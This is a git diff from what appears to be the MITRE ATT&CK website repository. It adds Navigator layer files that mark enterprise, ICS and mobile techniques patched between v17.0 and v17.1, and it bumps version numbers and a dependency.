"command-and-control", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1558.001", + "tactic": "credential-access", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1564.005", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1564.001", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1176.002", + "tactic": "persistence", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1219.001", + "tactic": "command-and-control", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1505.004", + "tactic": "persistence", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1525", + "tactic": "persistence", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1218.004", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1016.001", + "tactic": "discovery", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1114.001", + "tactic": "collection", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1204.004", + "tactic": "execution", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1204.003", + "tactic": "execution", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1601", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1218.005", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1104", + "tactic": "command-and-control", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1599.001", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1602.002", + "tactic": "collection", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1132.002", + "tactic": "command-and-control", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1218.008", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1102.003", + "tactic": "command-and-control", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1601.001", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1120", + "tactic": "discovery", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1205.001", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1205.001", + "tactic": "persistence", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1205.001", + "tactic": "command-and-control", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1055.002", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1055.002", + "tactic": "privilege-escalation", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1055.009", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1055.009", + "tactic": "privilege-escalation", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1564.010", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1055.013", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1055.013", + "tactic": "privilege-escalation", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1090", + "tactic": "command-and-control", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1055.008", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1055.008", + "tactic": "privilege-escalation", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1542.004", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1542.004", + "tactic": "persistence", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1600.001", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1218.009", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1219.003", + "tactic": "command-and-control", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1578.004", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1207", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1134.005", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1134.005", + "tactic": "privilege-escalation", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1602.001", + "tactic": "collection", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1562.009", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1547.005", + "tactic": "persistence", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1547.005", + "tactic": "privilege-escalation", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1574.010", + "tactic": "persistence", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1574.010", + "tactic": "privilege-escalation", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1574.010", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1558.002", + "tactic": "credential-access", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1036.006", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1001.002", + "tactic": "command-and-control", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1548.003", + "tactic": "privilege-escalation", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1548.003", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1614.001", + "tactic": "discovery", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1542.005", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1542.005", + "tactic": "persistence", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1221", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1055.003", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1055.003", + "tactic": "privilege-escalation", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1055.005", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1055.005", + "tactic": "privilege-escalation", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1505.002", + "tactic": "persistence", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1546.005", + "tactic": "privilege-escalation", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1546.005", + "tactic": "persistence", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1564.007", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1125", + "tactic": "collection", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1600", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + } + ], + "sorting": 0, + "hideDisabled": false, + "legendItems": [ + { + "color": "#a1d99b", + "label": "additions: ATT&CK objects which are only present in the new release." + }, + { + "color": "#fcf3a2", + "label": "major_version_changes: ATT&CK objects that have a major version change. (e.g. 1.0 \u2192 2.0)" + }, + { + "color": "#c7c4e0", + "label": "minor_version_changes: ATT&CK objects that have a minor version change. (e.g. 1.0 \u2192 1.1)" + }, + { + "color": "#B5E5CF", + "label": "other_version_changes: ATT&CK objects that have a version change of any other kind. (e.g. 1.0 \u2192 1.2)" + }, + { + "color": "#B99095", + "label": "patches: ATT&CK objects that have been patched while keeping the version the same. (e.g., 1.0 \u2192 1.0 but something like a typo, a URL, or some metadata was fixed)" + }, + { + "color": "#ff9000", + "label": "revocations: ATT&CK objects which are revoked by a different object." + }, + { + "color": "#ff6363", + "label": "deprecations: ATT&CK objects which are deprecated and no longer in use, and not replaced." + }, + { + "color": "#ff00e1", + "label": "deletions: ATT&CK objects which are no longer found in the STIX data." + }, + { + "color": "#ffffff", + "label": "unchanged: ATT&CK objects which did not change between the two versions." + } + ], + "showTacticRowBackground": true, + "tacticRowBackground": "#205b8f", + "selectTechniquesAcrossTactics": true +} \ No newline at end of file diff --git a/modules/resources/docs/changelogs/v17.0-v17.1/layer-ics.json b/modules/resources/docs/changelogs/v17.0-v17.1/layer-ics.json new file mode 100644 index 00000000000..12bd52dda32 --- /dev/null +++ b/modules/resources/docs/changelogs/v17.0-v17.1/layer-ics.json @@ -0,0 +1,104 @@ +{ + "versions": { + "layer": "4.5", + "navigator": "5.0.0", + "attack": "17.1" + }, + "name": "May 2025 ICS Updates", + "description": "ICS updates for the May 2025 release of ATT&CK", + "domain": "ics-attack", + "techniques": [ + { + "techniqueID": "T0800", + "tactic": "inhibit-response-function", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T0872", + "tactic": "evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T0801", + "tactic": "collection", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T0845", + "tactic": "collection", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T0852", + "tactic": "collection", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T0869", + "tactic": "command-and-control", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T0882", + "tactic": "impact", + "enabled": true, + "color": "#B99095", + "comment": "patche" + } + ], + "sorting": 0, + "hideDisabled": false, + "legendItems": [ + { + "color": "#a1d99b", + "label": "additions: ATT&CK objects which are only present in the new release." + }, + { + "color": "#fcf3a2", + "label": "major_version_changes: ATT&CK objects that have a major version change. (e.g. 1.0 \u2192 2.0)" + }, + { + "color": "#c7c4e0", + "label": "minor_version_changes: ATT&CK objects that have a minor version change. (e.g. 1.0 \u2192 1.1)" + }, + { + "color": "#B5E5CF", + "label": "other_version_changes: ATT&CK objects that have a version change of any other kind. (e.g. 1.0 \u2192 1.2)" + }, + { + "color": "#B99095", + "label": "patches: ATT&CK objects that have been patched while keeping the version the same. (e.g., 1.0 \u2192 1.0 but something like a typo, a URL, or some metadata was fixed)" + }, + { + "color": "#ff9000", + "label": "revocations: ATT&CK objects which are revoked by a different object." + }, + { + "color": "#ff6363", + "label": "deprecations: ATT&CK objects which are deprecated and no longer in use, and not replaced." + }, + { + "color": "#ff00e1", + "label": "deletions: ATT&CK objects which are no longer found in the STIX data." + }, + { + "color": "#ffffff", + "label": "unchanged: ATT&CK objects which did not change between the two versions." + } + ], + "showTacticRowBackground": true, + "tacticRowBackground": "#205b8f", + "selectTechniquesAcrossTactics": true +} \ No newline at end of file diff --git a/modules/resources/docs/changelogs/v17.0-v17.1/layer-mobile.json b/modules/resources/docs/changelogs/v17.0-v17.1/layer-mobile.json new file mode 100644 index 00000000000..e46fa4737cc --- /dev/null +++ b/modules/resources/docs/changelogs/v17.0-v17.1/layer-mobile.json @@ -0,0 +1,83 @@ +{ + "versions": { + "layer": "4.5", + "navigator": "5.0.0", + "attack": "17.1" + }, + "name": "May 2025 Mobile Updates", + "description": "Mobile updates for the May 2025 release of ATT&CK", + "domain": "mobile-attack", + "techniques": [ + { + "techniqueID": "T1577", + "tactic": "persistence", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1617", + "tactic": "defense-evasion", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1603", + "tactic": "execution", + "enabled": true, + "color": "#B99095", + "comment": "patche" + }, + { + "techniqueID": "T1603", + "tactic": "persistence", + "enabled": true, + "color": "#B99095", + "comment": "patche" + } + ], + "sorting": 0, + "hideDisabled": false, + "legendItems": [ + { + "color": "#a1d99b", + "label": "additions: ATT&CK objects which are only present in the new release." + }, + { + "color": "#fcf3a2", + "label": "major_version_changes: ATT&CK objects that have a major version change. (e.g. 1.0 \u2192 2.0)" + }, + { + "color": "#c7c4e0", + "label": "minor_version_changes: ATT&CK objects that have a minor version change. (e.g. 1.0 \u2192 1.1)" + }, + { + "color": "#B5E5CF", + "label": "other_version_changes: ATT&CK objects that have a version change of any other kind. (e.g. 1.0 \u2192 1.2)" + }, + { + "color": "#B99095", + "label": "patches: ATT&CK objects that have been patched while keeping the version the same. (e.g., 1.0 \u2192 1.0 but something like a typo, a URL, or some metadata was fixed)" + }, + { + "color": "#ff9000", + "label": "revocations: ATT&CK objects which are revoked by a different object." + }, + { + "color": "#ff6363", + "label": "deprecations: ATT&CK objects which are deprecated and no longer in use, and not replaced." + }, + { + "color": "#ff00e1", + "label": "deletions: ATT&CK objects which are no longer found in the STIX data." + }, + { + "color": "#ffffff", + "label": "unchanged: ATT&CK objects which did not change between the two versions." + } + ], + "showTacticRowBackground": true, + "tacticRowBackground": "#205b8f", + "selectTechniquesAcrossTactics": true +} \ No newline at end of file diff --git a/modules/resources/static_pages/updates-april-2025.md b/modules/resources/static_pages/updates-april-2025.md index 4d1facfce51..d714cd7a429 100644 --- a/modules/resources/static_pages/updates-april-2025.md +++ b/modules/resources/static_pages/updates-april-2025.md @@ -8,7 +8,7 @@ save_as: resources/updates/updates-april-2025/index.html | Version | Start Date | End Date | Data | Changelogs | |:--------|:-----------|:---------|:-----|:-----------| -| [ATT&CK v17](/versions/v17) | April 22, 2025 | Current version of ATT&CK | [v17.0 on MITRE/CTI](https://github.com/mitre/cti/releases/tag/ATT%26CK-v17.0) | 16.1 - 17.0 [Details](/docs/changelogs/v16.1-v17.0/changelog-detailed.html) ([JSON](/docs/changelogs/v16.1-v17.0/changelog.json)) | +| [ATT&CK v17](/versions/v17) | April 22, 2025 | Current version of ATT&CK | [v17.0 on MITRE/CTI](https://github.com/mitre/cti/releases/tag/ATT%26CK-v17.0)
[v17.1 on MITRE/CTI](https://github.com/mitre/cti/releases/tag/ATT%26CK-v17.1) | 16.1 - 17.0 [Details](/docs/changelogs/v16.1-v17.0/changelog-detailed.html) ([JSON](/docs/changelogs/v16.1-v17.0/changelog.json))
17.0 - 17.1 [Details](/docs/changelogs/v17.0-v17.1/changelog-detailed.html) ([JSON](/docs/changelogs/v17.0-v17.1/changelog.json)) | The April 2025 (v17) ATT&CK release updates Techniques, Groups, Campaigns and Software for Enterprise, Mobile, and ICS. diff --git a/modules/site_config.py b/modules/site_config.py index 58c618a3047..9bb53627140 100644 --- a/modules/site_config.py +++ b/modules/site_config.py @@ -179,8 +179,8 @@ def set_subdirectory(subdirectory_str): "save_as: ${path}/${attack_id}-${domain}-layer.json\n" "json: " ) -layer_version = "4.4" -navigator_version = "4.8.1" +layer_version = "4.5" +navigator_version = "5.1.0" # Directory for test reports test_report_directory = "reports" diff --git a/pyproject.toml b/pyproject.toml index bb0a2b75dae..28c07c199ec 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -6,7 +6,7 @@ profile = "black" [tool.towncrier] name = "ATT&CK website" - version = "4.2.2" + version = "4.2.3" filename = "CHANGELOG.md" issue_format = "[#{issue}](https://github.com/mitre-attack/attack-website/issues/{issue})" template = ".towncrier.template.md" diff --git a/requirements.txt b/requirements.txt index 86b00a3983c..63b58156166 100644 --- a/requirements.txt +++ b/requirements.txt @@ -4,7 +4,7 @@ bleach==6.1.0 colorama==0.4.6 future==1.0.0 loguru==0.7.2 -mitreattack-python==4.0.0 +mitreattack-python==4.0.1 pelican==4.10.2 python-dotenv==1.0.1 requests==2.32.3